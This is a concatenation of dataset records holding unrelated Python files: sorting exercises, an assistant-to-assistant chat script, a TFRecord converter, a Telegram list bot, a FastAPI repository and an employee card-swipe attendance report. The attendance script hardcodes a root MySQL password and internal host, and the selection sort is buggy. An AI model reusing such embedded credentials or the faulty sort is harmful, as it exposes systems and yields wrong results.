root.protocol(\"WM_DELETE_WINDOW\", root.quit)\r\n root.mainloop()\r\n root.destroy()\r\n \r\n print(\"Translation updates have been saved.\")\r\n \r\n file2.close()\r\n\r\n# Place the file you want to translate in the input folder and change the \"model_file_path\" value below to the path of your input file.\r\nmodel_file_path = 'input/'\r\n\r\n# Place the output file in the output folder and change the \"translation_file_path\" value below to the path of your output file.\r\ntranslation_file_path = 'output/'\r\n\r\n\r\ncompare_json_files(model_file_path, translation_file_path)\r\n","repo_name":"Grand-Roi-Pasteque/Json-Translator","sub_path":"json_translator/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37871590749","text":"def bubbleSort(newlist=[]):\n for i in range(0,len(newlist)-1):\n for j in range(0,len(newlist)-1): \n if newlist[j] > newlist[j+1]:\n newlist[j], newlist[j+1] = newlist[j+1], newlist[j]\n return newlist\n\nbubbleSort([5,6,7,11,34,4,56,87,1,2343,4,657686878,3,3,5,7,8,9,0,0,6,2,1])\n\n\n\ndef selectionSort(newlist = []):\n min = 0\n count = 0\n for i in range(0,len(newlist)-1):\n for j in range(i,len(newlist)-1):\n if min > newlist[j]: \n min = newlist[j]\n count = j\n newlist[count], newlist[i] = newlist[i],newlist[count]\n return newlist\n \nselectionSort([5,6,7,11,34,4,56,87,1,2343,4,657686878,3,3,5,7,8,9,0,0,6,2,1])\n\n ","repo_name":"Nassertakkesh/Python","sub_path":"extra_practice/bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33010098923","text":"import random\r\nfrom utils.coin_env import coin_game\r\n\r\n\r\ndef rule_based_AI(env):\r\n if env.state%3 != 0:\r\n move = env.state%3\r\n else:\r\n move = env.sample()\r\n return move\r\n\r\n\r\ndef random_player(env):\r\n move = env.sample()\r\n return move\r\n\r\n\r\n# Define the one_coin_game() function\r\ndef one_coin_game(player1, player2):\r\n env = coin_game()\r\n env.reset() \r\n while True: \r\n action = player1(env) \r\n new_state, reward, done, info = env.step(action)\r\n if done:\r\n break\r\n action = player2(env) \r\n new_state, reward, done, info = env.step(action)\r\n if done:\r\n break \r\n return reward ","repo_name":"markhliu/AlphaGoSimplified","sub_path":"utils/ch01util.py","file_name":"ch01util.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22436585862","text":"import time\nimport threading\nimport os\nimport openai\nfrom openai import OpenAI\n\nclient = OpenAI()\nclient.api_key = os.environ.get('OPENAI_API_KEY')\n\ndef get_last_assistant_message(thread_id):\n messages_response = client.beta.threads.messages.list(thread_id=thread_id)\n messages = messages_response.data\n \n # Iterate through messages in reverse chronological order to find the last assistant message\n for message in messages:\n if message.role == 'assistant':\n # Get the content of the last assistant message\n assistant_message_content = \" \".join(\n content.text.value for content in message.content if hasattr(content, 'text')\n )\n return assistant_message_content.strip()\n \n return \"\" # Return an empty string if there is no assistant message\n\ndef converse(assistant_1_params, assistant_2_params, topic, message_count):\n print(\"TOPIC: \"+topic+\"\\n\")\n # Initialize Assistants\n assistant_1 = client.beta.assistants.create(**assistant_1_params)\n assistant_2 = client.beta.assistants.create(**assistant_2_params)\n\n # Create Threads\n thread_1 = client.beta.threads.create()\n thread_2 = client.beta.threads.create()\n\n # Function for the conversation between two assistants\n def assistant_conversation(start_message, assistant_a, thread_a, assistant_b, thread_b, msg_limit):\n message_content = start_message\n last_user_message_id = None # Initialize with no last user message\n \n for i in range(msg_limit):\n # Determine which assistant is speaking for color coding\n if assistant_a == assistant_1:\n assistant_color = '\\033[94m\\033[1m' \n assistant_name = assistant_1_params.get('name')\n else:\n assistant_color = '\\033[92m\\033[1m'\n assistant_name = assistant_2_params.get('name')\n \n # Bold and color the assistant's name and print the turn\n print(f\"{assistant_color}{assistant_name} speaking...\\033[0m (Turn {i + 1})\")\n \n # Send the message and wait for a response\n user_message = client.beta.threads.messages.create(\n thread_id=thread_a.id,\n role=\"user\",\n content=message_content\n )\n \n # Run the assistant and wait until it's done\n run = client.beta.threads.runs.create(\n thread_id=thread_a.id,\n assistant_id=assistant_a.id\n )\n while True:\n run_status = client.beta.threads.runs.retrieve(\n thread_id=thread_a.id,\n run_id=run.id\n )\n if run_status.status == 'completed':\n break\n time.sleep(1) # sleep to avoid hitting the API too frequently\n \n # Get all messages from the assistant since the last 'user' message\n message_content = get_last_assistant_message(thread_a.id)\n \n # Print out each of the assistant's messages\n print(message_content+\"\\n\")\n \n # Swap the assistants and threads for the next turn in the conversation\n assistant_a, assistant_b = assistant_b, assistant_a\n thread_a, thread_b = thread_b, thread_a\n\n\n # Start the conversation\n start_message = f\"Respond with a starting line to discuss {topic}?\"\n conversation_thread = threading.Thread(\n target=assistant_conversation,\n args=(start_message, assistant_1, thread_1, assistant_2, thread_2, message_count)\n )\n conversation_thread.start()\n conversation_thread.join()\n\n# Define the parameters for the two assistants (example parameters provided)\nassistant_1_params = {\n 'name': \"Pirate\",\n 'instructions': \"You are a mean pirate.\",\n 'tools': [{\"type\": \"code_interpreter\"}],\n 'model': \"gpt-3.5-turbo-1106\"\n}\n\nassistant_2_params = {\n 'name': \"Mermaid\",\n 'instructions': \"You are a bubbly mermaid who speaks like a Valley Girl.\",\n 'tools': [{\"type\": \"code_interpreter\"}],\n 'model': \"gpt-3.5-turbo-1106\"\n}\n\n# Example usage:\nconverse(assistant_1_params, assistant_2_params, \"global warming\", 5)\n","repo_name":"yoheinakajima/GPTvsGPT","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"3"} +{"seq_id":"2203576012","text":"from sklearn.svm import LinearSVC\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\n# classification 0 or 1\r\n\r\n# 0 = dog // 1 = pig\r\n\r\n# guess by features \r\n\r\n#dog or pig\r\n#long hair \r\n#short leg \r\n#song \"Auau\"\r\n\r\ndef main():\r\n #my code\r\n pig1 = [0,1,0]\r\n pig2 = [0,1,1]\r\n pig3 = [1,1,0]\r\n\r\n dog1 = [0,1,1]\r\n dog2 = [1,0,1]\r\n dog3 = [0,1,1]\r\n\r\n train_x = [pig1,pig2,pig3,dog1,dog2,dog3]\r\n train_y = [1,1,1,0,0,0]\r\n\r\n # f(x) = y \r\n model = LinearSVC()\r\n model.fit(train_x, train_y)\r\n\r\n mistery_animal1 = [1,1,1]\r\n mistery_animal2 = [1,1,0]\r\n mistery_animal3 = [0,1,1]\r\n\r\n test_x = [mistery_animal1 , mistery_animal2 , mistery_animal3]\r\n test_y = [0 , 1 ,1]\r\n \r\n p = model.predict(test_x)\r\n\r\n #accuracy \r\n hit_rate = accuracy_score(test_y, p)\r\n\r\n print(hit_rate)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"guicosta01/ML_Classification","sub_path":"classification_dog_pig.py","file_name":"classification_dog_pig.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29366187352","text":"r\"\"\"Convert raw PASCAL dataset to TFRecord for object_detection.\n\nExample usage:\n python object_detection/dataset_tools/create_pascal_tf_record_my.py \\\n --data_dir=/home/user/VOCdevkit \\\n --year=VOC2012 \\\n --output_path=/home/user/pascal.record\n\"\"\"\n# from __future__ import absolute_import\n# from __future__ import division\n# from __future__ import print_function\n\nimport hashlib\nimport io\nimport logging\nimport os\n\nfrom lxml import etree\nimport PIL.Image\nimport tensorflow as tf\n\n# absl 库全称是 Abseil Python Common Libraries。它原本是个C++库,后来被迁移到了Python上。\nfrom absl import app, flags, logging\n\nfrom pathlib import Path\nimport cv2\n\n# import tensorflow.compat.v1 as tf\n# FLAGS = tf.app.flags.FLAGS\n\n# from dataset_tools.utils import utils.dataset_util\n# from object_detection.utils import label_map_util\n\n# from utils.dataset_util import *\n# from utils.label_map_util import *\nimport utils.dataset_util as dataset_util\nimport utils.label_map_util as label_map_util\n\n# flags = tf.app.flags\n# flags = tf.compat.v1.flags\n\nflags.DEFINE_string('data_dir', '', 'Root directory to raw PASCAL VOC dataset.')\nflags.DEFINE_string('name', '', 'Desired challenge name.')\n# flags.DEFINE_string('set', 'train', 'Convert training set, validation set or '\n# 'merged set.')\nflags.DEFINE_string('annotations_dir', 'Annotations',\n '(Relative) path to annotations directory.')\n\nflags.DEFINE_string('label_map_path', 'label_map.pbtxt',\n 'Path to label map proto')\nflags.DEFINE_boolean('ignore_difficult_instances', False, 'Whether to ignore '\n 'difficult instances')\n# flags.DEFINE_string('action', 'tfrecord', 'Action in [tfrecord, imageset]')\n# flags.DEFINE_string('imageset', 'image', 'image set name')\nflags.DEFINE_string('output_path', '', 'Path to output TFRecord')\n\nFLAGS = flags.FLAGS\n\nSETS = ['train', 'val', 'trainval', 'test']\n\n\n# YEARS = ['VOC2007', 'VOC2012', 'merged']\n\ndef get_all_annotations(annotations_dir):\n all_annotations = []\n for root, dirs, files in os.walk(annotations_dir):\n for file in files:\n if os.path.splitext(file)[1] == '.xml':\n all_annotations.append(os.path.splitext(file)[0])\n return all_annotations\n\n\ndef write_annotations(annotations, data_folder, image_set):\n imageset_main_dir = os.path.join(data_folder, 'ImageSets', 'Main')\n if not os.path.exists(imageset_main_dir):\n os.makedirs(imageset_main_dir)\n imageset_file = imageset_main_dir + os.sep + image_set + '.txt'\n with open(imageset_file, 'w') as wf:\n for annotation in annotations:\n wf.write(annotation + '\\n')\n\n\ndef gen_image_set(data_folder, imageset):\n imageset_main_dir = os.path.join(data_folder, 'ImageSets', 'Main')\n if not os.path.exists(imageset_main_dir):\n os.makedirs(imageset_main_dir)\n imageset_file = imageset_main_dir + os.sep + imageset + '.txt'\n annotations_dir = os.path.join(data_folder, FLAGS.annotations_dir)\n with open(imageset_file, 'w') as wf:\n for root, dirs, files in os.walk(annotations_dir):\n for file in files:\n if os.path.splitext(file)[1] == '.xml':\n wf.write(os.path.splitext(file)[0] + '\\n')\n\n\ndef convert_image_format(full_path, dst_fmt='.jpg'):\n # path = 'G:/Samples/Customer/officeflower/JPEGImages/0016.bmp'\n filepath, tmpfilename = os.path.split(full_path)\n shotname, extension = os.path.splitext(tmpfilename)\n # print(filepath, shotname, extension)\n if extension != '.jpg':\n dst = os.path.join(filepath, shotname + dst_fmt)\n img = cv2.imread(full_path)\n cv2.imwrite(dst, img)\n return dst\n return full_path\n\n\ndef dict_to_tf_example(data,\n dataset_directory,\n label_map_dict,\n ignore_difficult_instances=False,\n image_subdirectory='JPEGImages'):\n \"\"\"Convert XML derived dict to tf.Example proto.\n\n Notice that this function normalizes the bounding box coordinates provided\n by the raw .data.\n\n Args:\n data: dict holding PASCAL XML fields for a single image (obtained by\n running dataset_util.recursive_parse_xml_to_dict)\n dataset_directory: Path to root directory holding PASCAL dataset\n label_map_dict: A map from string label names to integers ids.\n ignore_difficult_instances: Whether to skip difficult instances in the\n dataset (default: False).\n image_subdirectory: String specifying subdirectory within the\n PASCAL dataset directory holding the actual image .data.\n\n Returns:\n example: The converted tf.Example.\n\n Raises:\n ValueError: if the image pointed to by .data['filename'] is not a valid JPEG\n \"\"\"\n img_path = os.path.join(data['folder'], image_subdirectory, data['filename'])\n full_path = os.path.join(dataset_directory, img_path)\n\n if not Path(full_path).exists() and 'path' in data and data['path']:\n full_path = data['path'] # for label image tools\n\n if not Path(full_path).exists():\n full_path = os.path.join(dataset_directory, 'JPEGImages', data['filename'])\n if not Path(full_path).exists():\n name, ext = os.path.splitext(full_path)\n full_path = name + '.jpg'\n if not Path(full_path).exists():\n logging.error('Image not find at %s', full_path)\n return\n print('Process', full_path)\n ## convert image format\n full_path = convert_image_format(full_path)\n\n with tf.io.gfile.GFile(full_path, 'rb') as fid:\n encoded_jpg = fid.read()\n encoded_jpg_io = io.BytesIO(encoded_jpg)\n image = PIL.Image.open(encoded_jpg_io)\n if image.format != 'JPEG':\n raise ValueError('Image format not JPEG')\n key = hashlib.sha256(encoded_jpg).hexdigest()\n\n width = int(data['size']['width'])\n height = int(data['size']['height'])\n\n xmin = []\n ymin = []\n xmax = []\n ymax = []\n classes = []\n classes_text = []\n truncated = []\n poses = []\n difficult_obj = []\n if 'object' in data:\n for obj in data['object']:\n difficult = bool(int(obj['difficult']))\n if ignore_difficult_instances and difficult:\n continue\n\n difficult_obj.append(int(difficult))\n\n xmin_val = float(obj['bndbox']['xmin'])\n ymin_val = float(obj['bndbox']['ymin'])\n xmax_val = float(obj['bndbox']['xmax'])\n ymax_val = float(obj['bndbox']['ymax'])\n if xmin_val > xmax_val:\n xmin_val, xmax_val = xmax_val, xmin_val\n if ymin_val > ymax_val:\n ymin_val, ymax_val = ymax_val, ymin_val\n\n xmin.append(xmin_val / width)\n ymin.append(ymin_val / height)\n xmax.append(xmax_val / width)\n ymax.append(ymax_val / height)\n classes_text.append(obj['name'].encode('utf8'))\n classes.append(label_map_dict[obj['name']])\n truncated.append(int(obj['truncated']))\n if 'pose' in obj and obj['pose']:\n poses.append(obj['pose'].encode('utf8'))\n else:\n poses.append(\"Unspecified\".encode('utf8'))\n\n # if want to omit the no object sample:\n # if not xmin:\n # return None\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': dataset_util.int64_feature(height),\n 'image/width': dataset_util.int64_feature(width),\n 'image/filename': dataset_util.bytes_feature(\n data['filename'].encode('utf8')),\n 'image/source_id': dataset_util.bytes_feature(\n data['filename'].encode('utf8')),\n 'image/key/sha256': dataset_util.bytes_feature(key.encode('utf8')),\n 'image/encoded': dataset_util.bytes_feature(encoded_jpg),\n 'image/format': dataset_util.bytes_feature('jpeg'.encode('utf8')),\n 'image/object/bbox/xmin': dataset_util.float_list_feature(xmin),\n 'image/object/bbox/xmax': dataset_util.float_list_feature(xmax),\n 'image/object/bbox/ymin': dataset_util.float_list_feature(ymin),\n 'image/object/bbox/ymax': dataset_util.float_list_feature(ymax),\n 'image/object/class/text': dataset_util.bytes_list_feature(classes_text),\n 'image/object/class/label': dataset_util.int64_list_feature(classes),\n 'image/object/difficult': dataset_util.int64_list_feature(difficult_obj),\n 'image/object/truncated': dataset_util.int64_list_feature(truncated),\n 'image/object/view': dataset_util.bytes_list_feature(poses),\n }))\n return example\n\n\ndef main(_):\n data_dir = FLAGS.data_dir\n name = FLAGS.name\n data_folder = os.path.join(data_dir, name)\n annotations_dir = os.path.join(data_dir, name, FLAGS.annotations_dir)\n all_annotations = get_all_annotations(annotations_dir)\n # msg = f\"\"\"\n # data folder: {data_folder},\n # annotations dir: {annotations_dir},\n #\n # \"\"\"\n # print()\n\n train_set = os.path.join(data_folder, \"ImageSets\", \"Main\") + os.sep + 'train.txt'\n val_set = os.path.join(data_folder, \"ImageSets\", \"Main\") + os.sep + 'val.txt'\n\n if not os.path.exists(train_set):\n logging.info(\"Train set not fount, generate 80% from all data.\")\n write_annotations(all_annotations[:int(len(all_annotations) * 0.8)], data_folder, 'train')\n else:\n train_set_number = 0\n with open(train_set) as f:\n for line in f.readlines():\n if line.strip():\n train_set_number += 1\n\n logging.info(f\"Using {train_set} which has total {train_set_number} training sample\")\n\n if not os.path.exists(val_set):\n logging.info(\"Validate set not fount, generate 20% from all data.\")\n write_annotations(all_annotations[int(len(all_annotations) * 0.8):], data_folder, 'val')\n else:\n val_set_number = 0\n with open(val_set) as f:\n for line in f.readlines():\n if line.strip():\n val_set_number += 1\n\n logging.info(f\"Using {val_set} which has total {val_set_number} validate sample\")\n\n label_map_path = FLAGS.label_map_path\n if not os.path.exists(label_map_path):\n logging.info(\"Label map not fount in %s(FLAGS.label_map_path), try to find at %s\", label_map_path, data_folder)\n label_map_path = os.path.join(data_folder, FLAGS.label_map_path)\n if not os.path.exists(label_map_path):\n logging.info(\"%s not fount, failed!\", label_map_path)\n return\n\n output_path = FLAGS.output_path\n if not output_path:\n out_name = os.path.basename(data_folder)\n if not out_name:\n out_name = os.path.basename(data_dir)\n output_path = os.path.basename(out_name) + '.tfrecord'\n\n logging.info(\"Using label map path: %s.\", label_map_path)\n logging.info(\"Using annotations dir: %s.\", annotations_dir)\n logging.info(\"Using output path: %s.\", output_path)\n\n ans = input(\"Press Y to confirm, N to exit. (Y/N)\")\n if ans == \"N\":\n return\n\n label_map_dict = label_map_util.get_label_map_dict(label_map_path)\n\n for set_name, image_set_path in zip(('train', 'val'), (train_set, val_set)):\n set_path = os.path.splitext(output_path)[0] + '_' + set_name + os.path.splitext(output_path)[1]\n logging.info(\"Generate data set %s from %s at %s\", set_name, image_set_path, set_path)\n\n examples_list = dataset_util.read_examples_list(image_set_path)\n writer = tf.io.TFRecordWriter(set_path)\n step = max(len(examples_list) // 10 // 100 * 100, 10)\n for idx, example in enumerate(examples_list):\n if idx % step == 0:\n logging.info('On image %d of %d', idx, len(examples_list))\n path = os.path.join(annotations_dir, example + '.xml')\n if not Path(path).exists():\n logging.error('Annotation xml %s not exist, press any key to continue..., q for quit.', path)\n key = input()\n if key == 'q':\n break\n else:\n continue\n\n with tf.io.gfile.GFile(path, 'r') as fid:\n xml_str = fid.read()\n xml = etree.fromstring(xml_str.encode('utf-8'))\n\n data_dic = dataset_util.recursive_parse_xml_to_dict(xml) # ['annotation']\n if 'annotation' in data_dic:\n data = data_dic['annotation']\n elif 'Annotation' in data_dic:\n data = data_dic['Annotation']\n\n # logging.info(\"Create tf example for %s.\", path)\n\n tf_example = dict_to_tf_example(data, data_folder, label_map_dict,\n FLAGS.ignore_difficult_instances)\n if tf_example:\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\n\n\"\"\"\nusage\ndata_dir: root data folder\nname: task sample name (在data_dir下面的文件夹,默认为空,代表 data_dir 就是数据集目录,而不是所有数据根目录)\n\n如果 data_dir/name/ImageSets/Main 下面没有 train.txt 或者 val.txt 则根据 4:1 比例自动生成\nlabel_map_dict: 相对于 data_dir/name/,路径为 data_dir/name/label_map_dict\n\n分成多个时间(year)文件夹的好处是,可以增量放数据,\n\n\"\"\"\n\n\"\"\"\nrelease note:\n2022/02/17:\n数据集格式:根目录, label_map.pbtxt 放在这个目录下面\n下面命令会自动生成 xxx_train.tfrecord xxx_val.tfrecord\npython create_pascal_tf_record.py --data_dir=data_folder --output_path=xxx.tfrecord\n\n\"\"\"\n\n# ----------------\n# python create_pascal_tf_record_my.py --action=imageset --data_dir=C:\\simpleSample --year=doorline --set=train\n# python create_pascal_tf_record_my.py --action=tfrecord --data_dir=C:\\simpleSample --label_map_path=.\\.data\\test.pbtxt --year=doorline --imageset=image --set=train --output_path=C:\\pascal_train.record\n# python create_pascal_tf_record_my.py --data_dir=G:\\dataset\\VOCdevkit --label_map_path=pascal_label_map.pbtxt --year=VOC2012 --set=train --output_path=G:\\pascal_train.record\n# >python create_pascal_tf_record_my.py --data_dir=H:\\Samples\\VOC\\VOCdevkit --label_map_path=.\n# \\data\\pascal_label_map.pbtxt --year=VOC2012 --imageset=train --set=train --output_path=H:\\pascal_train.record\nif __name__ == '__main__':\n app.run(main)\n\n\"\"\"\n\npython create_pascal_tf_record.py --data_dir=/media/dev/samples/officeflower --output_path=xxx.tfrecord\n\n\n\"\"\"\n","repo_name":"richaolas/TrainingTools","sub_path":"dataset_tools/create_pascal_tf_record.py","file_name":"create_pascal_tf_record.py","file_ext":"py","file_size_in_byte":14546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31040214543","text":"## 잘못생각한점 : 모든 input data를 변환할 필요가 없이 sort시키면 동일한 anagram은 동일하게 출력된다\n## 만약 sort할수 없다면 ? 그 때는 변환기를 사용할 필요가 있을까?\n\n## 추가실수 - sorted사용시 list형태로 반환되기 때문에 다시 str화 시켜줘야하고\n## 이때 str()이 아닌 \"\".join을 활용해야한다\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n \n result=[]\n decode={}\n for i in strs:\n s=\"\".join(sorted(i))\n if decode.get(s):\n decode[s].append(i)\n else:\n decode[s]=[]\n decode[s].append(i)\n \n keys=list(decode.keys())\n \n for key in keys:\n result.append(decode[key])\n \n return result","repo_name":"ske-kr/Myalgorithm","sub_path":"etc/leetcode_GroupAnagrams.py","file_name":"leetcode_GroupAnagrams.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37318190417","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom telegram.ext import MessageHandler, Filters\nfrom telegram.error import TelegramError\nfrom telegram.error import (TelegramError, Unauthorized, BadRequest,\n TimedOut, ChatMigrated, NetworkError)\nfrom dao import Dao\nimport pprint\nimport functools\nimport datetime\nimport logging\nimport re\n\n\ndef send(func):\n @functools.wraps(func)\n def wrapper_send(*args, **kwargs):\n message = func(*args, **kwargs)\n args[2].bot.send_message(\n chat_id=args[1].effective_chat.id,\n text=message)\n return message\n return wrapper_send\n\n\ndef tag(func):\n @functools.wraps(func)\n def wrapper_tag(*args, **kw):\n tag = args[0].dao.tag_exists(args[2].args[0])\n if not tag:\n raise TelegramError(\"Wie heißt denn die List?\")\n return wrapper_tag\n\n\ndef context_args(arg_count):\n def decorator(func):\n @functools.wraps(func)\n def wrapper_context_args(*args, **kwargs):\n if (len(args[2].args) < arg_count):\n raise TelegramError(\"Leider zu wenige Argumente\")\n tag = args[2].args[0]\n command_args = args[2].args[1:]\n return func(args[0], args[1], args[2], tag, command_args)\n return wrapper_context_args\n return decorator\n\n\ndef telegram_command(func):\n @functools.wraps(func)\n def wrapper_telegram_command(self, *args, **kwargs):\n kwargs['update'] = args[0]\n kwargs['context'] = args[1]\n tag = None\n command_args = None\n if(len(args[1].args) > 0):\n tag = args[1].args[0]\n if(len(args[1].args) > 1):\n command_args = args[1].args[1:]\n return func(self, tag, command_args, **kwargs)\n return wrapper_telegram_command\n\n\nclass View(object):\n\n def __init__(self, dao):\n self.logger = logging.getLogger(\"minna.view\")\n self.dao = dao\n\n def convert_ts(self, timestamp):\n return datetime.datetime.fromtimestamp(timestamp).strftime('%d.%m.%Y')\n\n def print_column(self, table, column):\n result = ''\n for i, row in enumerate(table):\n result += '{}. {} \\n'.format(i+1, row[column])\n return result\n\n @send\n @telegram_command\n def all_lists_handler(self, tag, command_args, **kw):\n all_lists = self.dao.all_lists()\n return self.print_column(all_lists, 1)\n\n @send\n @telegram_command\n def add_new_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Keine Liste:(\")\n if self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste gibt es schon:)\")\n self.dao.new_list(tag)\n return \"neue Liste '{}' erstellt\".format(tag)\n\n @send\n @telegram_command\n def add_items_to_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Zu welcher Liste soll ich die Sachen\"\n \"hinzufügen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n if not command_args:\n raise TelegramError(\"Was soll ich denn hinzufügen?\")\n self.dao.add_items_to_list(command_args, tag)\n return self.print_column(self.dao.get_content(tag), 0)\n\n @send\n @telegram_command\n def get_content_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Welche Liste soll ich ausgeben?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n items = self.dao.get_content(tag)\n return self.print_column(items, 0)\n\n @send\n @telegram_command\n def delete_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Welche Liste soll ich löschen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n self.dao.delete_list(tag)\n return \"Liste {} gelöscht\".format(tag)\n\n @send\n @telegram_command\n def delete_items_from_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Von welcher Liste soll ich löschen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n if not command_args:\n raise TelegramError(\"Jetzt habe ich ja gar nix zu löschen:)\")\n save_to_delete = self.dao.items_exist(command_args, tag)\n for item in save_to_delete:\n self.dao.delete_item_from_list(item, tag)\n return \"Gelöscht von {}: {}\".format(tag, ' '.join(save_to_delete))\n\n @send\n @telegram_command\n def add_sentence_to_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Zu welcher Liste soll ich das TODO\"\n \"hinzufügen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n if not command_args:\n raise TelegramError(\"Was soll ich denn hinzufügen?\")\n item = ' '.join(command_args)\n self.dao.add_item_to_list(item, tag)\n return \"TODO '{}' zu '{}' hinzugefügt! Frohes schaffen:)\".format(item, tag)\n\n @send\n @telegram_command\n def delete_sentence_from_list_handler(self, tag, command_args, **kw):\n if not tag:\n raise TelegramError(\"Von welcher Liste soll ich löschen?\")\n if not self.dao.tag_exists(tag):\n raise TelegramError(\"Diese Liste '{}’ finde ich nicht\".format(tag))\n if not command_args:\n raise TelegramError(\"Jetzt habe ich ja gar nix zu löschen:)\")\n item = ' '.join(command_args)\n self.dao.delete_item_from_list(item, tag)\n return \"TODO '{}' von '{}' gelöscht! Super:)\".format(item, tag)\n\n\n @send\n def error_callback(self, update, context):\n logger = logging.getLogger(\"minna.tele_error\")\n try:\n raise context.error\n except Unauthorized as e:\n logger.warning(e)\n return \"Unauthorized - \" + str(e)\n\n except BadRequest as e:\n logger.warning(e)\n return \"BadRequest - \" + str(e)\n\n except TimedOut as e:\n logger.warning(e)\n return \"TimedOut - \" + str(e)\n\n except NetworkError as e:\n logger.warning(e)\n return \"NetworkError - \" + str(e)\n\n except ChatMigrated as e:\n logger.warning(e)\n return \"ChatMigrated - \" + str(e)\n \n except TelegramError as e:\n logger.warning(e)\n return \"TeleError - \" + str(e)\n\n\n\n\n\n\n","repo_name":"CheesyB/minna","sub_path":"minna/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":6808,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70198366802","text":"import pymysql\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport datetime\n\nclass DF_to_Mysql_DB:\n def __init__(self):\n self.connect = create_engine('mysql+pymysql://root:Admin_polestar1@10.234.9.200:3306/RPT')\n\n def send_to_mysql(self, table_name, df):\n df.to_sql(name=table_name, con=self.connect, if_exists='replace', index=False)\n\nclass Mysql_Analysis:\n def __init__(self):\n self.db = pymysql.connect(host='10.234.9.200', port=3306, user ='root', password='Admin_polestar1', db='RPT')\n self.cursor = self.db.cursor()\n\n def execute_sql(self, sql_str):\n self.cursor.execute(sql_str)\n rows = self.cursor.fetchall()\n return rows\n\n def __del__(self):\n self.cursor.close()\n self.db.close()\n\n# 进行分析,取需要的数据,生成统计结果\nana_conn = Mysql_Analysis()\n# 抓取72小时内每张卡的最后一次刷卡记录,筛选出最后一次是刷进工厂的记录,并补上相应的员工信息\nsql_ana_detail = '''\nselect lg.card_no, lg.last_grant_time, tp.logical_device, tp.lname, tp.fname, tp.company, tp.department from\n(select card_no, max(event_time) last_grant_time from prowatch_data\nwhere logical_device like 'PSCD%Gate%' and event_time > date_sub(CURRENT_TIMESTAMP(), interval '3 00:00:00' day_second) and status = 'Active'\ngroup by card_no) lg left join prowatch_data tp on (lg.card_no = tp.card_no and lg.last_grant_time = tp.event_time) where lower(tp.logical_device) like '%in'\n'''\nrslt_data = ana_conn.execute_sql(sql_ana_detail)\n\nlast_refresh_time = ana_conn.execute_sql(\"select last_end FROM config_data_extraction where program = 'prowatch_data_increase_get'\")\nlast_refresh_time = last_refresh_time[0][0]\nlast_refresh_time2 = last_refresh_time - datetime.timedelta(hours=8)\n\n# 将数据转为DataFrame,整理后写入Mysql数据库\nrslt_df_detail = pd.DataFrame(rslt_data)\nrslt_df_detail.columns = ['Card_No','Enter_Timestamp','Enter_Location','LNAME','FNAME','Company','Department']\nrslt_df_detail['Refresh_Timestamp'] = last_refresh_time\nrslt_df_detail['Refresh_Timestamp2'] = last_refresh_time2\n\nfor i in range(len(rslt_df_detail)):\n rslt_df_detail.iloc[i,6] = rslt_df_detail.iloc[i,6].upper().replace('\\n','').replace('\\r','').replace(' ','')\n\nwrite_conn = DF_to_Mysql_DB()\nwrite_conn.send_to_mysql('in_plant_details', rslt_df_detail)\n\nprint(1)\n\n\n\n\n\n\n","repo_name":"zjustranger/Simple_Dev_PSCD","sub_path":"Check_Attendance/refresh_report_to_DB.py","file_name":"refresh_report_to_DB.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37611136796","text":"from fastapi.params import Depends\nfrom sqlalchemy.orm import Session\n\nfrom db.connection import get_db\nfrom db.models import Student\n\n\nclass StudentRepository:\n\n def __init__(self, db: Session = Depends(get_db)):\n self.db = db\n\n def list(self) -> list[Student]:\n return self.db.query(Student).all()\n\n def create(self, name: str, email: str) -> Student:\n db_student = Student(name=name, email=email)\n self.db.add(db_student)\n self.db.commit()\n self.db.refresh(db_student)\n return db_student\n","repo_name":"juanbenitopr/taller_fastapi","sub_path":"repositories/student_repository.py","file_name":"student_repository.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} 